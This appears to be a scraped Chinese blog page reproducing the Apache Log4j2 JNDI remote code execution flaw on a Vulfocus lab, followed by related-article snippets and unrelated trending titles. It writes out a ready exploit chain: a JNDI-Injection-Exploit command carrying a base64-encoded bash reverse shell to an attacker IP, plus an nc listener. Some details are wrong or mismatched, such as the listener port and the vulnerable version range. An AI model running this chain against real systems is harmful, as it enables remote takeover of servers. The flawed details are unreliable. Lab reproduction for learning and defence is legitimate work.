建议直接通过靶场开源项目——Vulfocus进行测试(自行注册)
然后需要一个VSP服务器,我使用的是阿里云。
下载JDK,注意需要jdk1.8.0或者1.7其他版本可能有问题
curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz
tar zxvf jdk-8u20-linux-x64.tar.gz
rm -rf /usr/bin/java*
ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin

下载一个jar包用来搭建ldap服务器和http服务器
链接:https://pan.baidu.com/s/11NkWPbvyO0dTEK-D6MmKLQ
提取码:1234

下载之后运行这个jar包,执行以下命令开启
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}” -A “1.2.3.4”
说明:上面的base64就是一个反弹shell的代码,换成自己的ip和监听端口,重新生成base64放进即可,还有后面-A的也换成自己的监听ip

执行命令之后,启动了服务,终端会显示5个payload,按自己的java版本选择对应的payload去执行即可,这里我选的第5个payload:rmi://xx.xx.xx.xx:1099/vgylii
然后我们在开启一个终端,监听刚刚设置的端口9999
nc -lvnp 999

  1. Apache Log4j2版本大于2小于2.82
  2. 有反序列化的利用链,因为这个漏洞只是提供给你一个让你传递反序列化数据的入口而已,至于能不能rce则是取决于被攻击机器上有没有完整的利用链。

RMI协议 rmi:// com.sun.jndi.url.rmi.rmiURLContext
LDAP协议 ldap:// com.sun.jndi.url.ldap.ldapURLContext

Apache Log4j2远程代码执行漏洞复现相关推荐

  1. Apache Log4j2远程代码执行漏洞风险紧急通告,腾讯安全支持全面检测拦截

    腾讯安全注意到,一个Apache Log4j2的高危漏洞细节被公开,攻击者利用漏洞可以远程执行代码. 漏洞描述: 腾讯安全注意到,一个Apache Log4j2反序列化远程代码执行漏洞细节已被公开,L ...

  2. Apache Log4j2远程代码执行漏洞攻击,华为云安全支持检测拦截

    近日,华为云安全团队关注到Apache Log4j2 的远程代码执行最新漏洞.Apache Log4j2是一款业界广泛使用的基于Java的日志工具,该组件使用范围广泛,利用门槛低,漏洞危害极大.华为云 ...

  3. 【紧急】Apache Log4j2 远程代码执行漏洞

    0x01 漏洞背景 12月9日,监测到网上披露Apache Log4j2 远程代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可 ...

  4. Apache Log4j2 远程代码执行 漏洞

    1.漏洞说明 Apache Log4j2是一个基于Java的日志记录工具.该工具重写了Log4j框架,并且引入了大量丰富的特性.该日志框架被大量用于业务系统开发,用来记录日志信息.大多数情况下,开发者 ...

  5. Apache Log4j2远程代码执行漏洞

    漏洞介绍 Apache Log4j2是一个基于Java的日志记录工具.该工具重写了Log4j框架,并且引入了大量丰富的特性.该日志框架被大量用于业务系统开发,用来记录日志信息.大多数情况下,开发者可能 ...

  6. 分析Apache Log4j2 远程代码执行漏洞

    漏洞描述 Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台.文件.GUI组件,甚至是套接口服务器.NT的事件记录器.UNIX Syslog守护进程等:也 ...

  7. Apache Log4j2远程代码执行漏洞(CVE-2021-44228)

    发布日期:2021-12-12 名称:Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) 级别:严重 描述信息:Apa ...

  8. 安全漏洞:Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)

    阿里云漏洞库 (aliyun.com) 漏洞介绍 解决建议 1.排查应用是否引入了Apache log4j-core Jar包,若存在依赖引入,且在受影响版本范围内,则可能存在漏洞影响.同时为了避免在 ...

  9. Apache Log4j2 远程代码执行高危漏洞 解决方案

    新闻:https://view.inews.qq.com/a/20211210A05KTY00 博主其他文章 Log4j2 高危漏洞分析 简介: Apache Log4j2是一款优秀的Java日志框架 ...

  10. 快速修复 Log4j2 远程代码执行漏洞步骤

    点击关注公众号,实用技术文章及时了解 来源:blog.csdn.net/weixin_48990070/ article/details/121861553 目录 漏洞说明 修复步骤 下载源码zip包 ...

最新文章

  1. 2017年 JavaScript 框架回顾 -- 前端框架
  2. lostash Timeout executing grok 问题排查
  3. leetcode1025. 除数博弈(dp/数学)
  4. 圆与平面的接触面积_视频:5.3RJ六年级上册圆的面积例题+习题讲解
  5. 前端性能优化—回流与重绘
  6. duilib入门简明教程 -- 前言(1)
  7. webpack和webpack-dev-server安装配置(遇到各种问题的解决方法)
  8. ocr带单字坐标离线识别
  9. 2022-2027年(新版)中国工程造价咨询行业现状动态与未来前景预测报告
  10. 英特尔hd630驱动_Ubuntu 16.04安装Intel显卡驱动(解决Intel HD Graphics 630显卡驱动问题)...
  11. 大学excel题库含答案_2017excel试题库附答案.doc
  12. Android静态库和动态库的区别
  13. 不使用80,443,端口,域名还需要备案吗?域名没有备案应该怎么选服务器。
  14. 《CCNet: Criss-Cross Attention for Semantic Segmentation》--阅读笔记-ICCV2019
  15. 【年终总结】你好2021,再见2020。
  16. 从全球价值链视角看,京东云数智供应链对未来经济有何影响?
  17. Chapter 5 分类算法——决策树与随机森林
  18. Fcitx 小企鹅输入法3.0.0
  19. DS图—图的最短路径(不含代码框架)
  20. 计算机课怎么加水印,简单给文档添加水印

热门文章

  1. Co-occurrence网络图绘制教程(附详细代码)
  2. JAVA博雅楼自习室预约系统计算机毕业设计Mybatis+系统+数据库+调试部署
  3. 初探数据湖(Data Lake),到底有什么用?让我们来一窥究竟...
  4. 企业微信和个人微信的区别是什么?
  5. 初学单片机,该如何选择单片机开发板?
  6. Sharding-JDBC分布式事务总结(四)之BASE事务(Seat框架中——AT模式的介绍以及理解)
  7. 诗词格律[7] 诗词的唱和
  8. VLAN隔离葵花宝典(一)
  9. 三星显示器 测试软件,3D+TV+APP!三星27英寸LED显示器全国首测
  10. 抖音/快手/火山热门技术---抖音微商引流之抖音实战引流技巧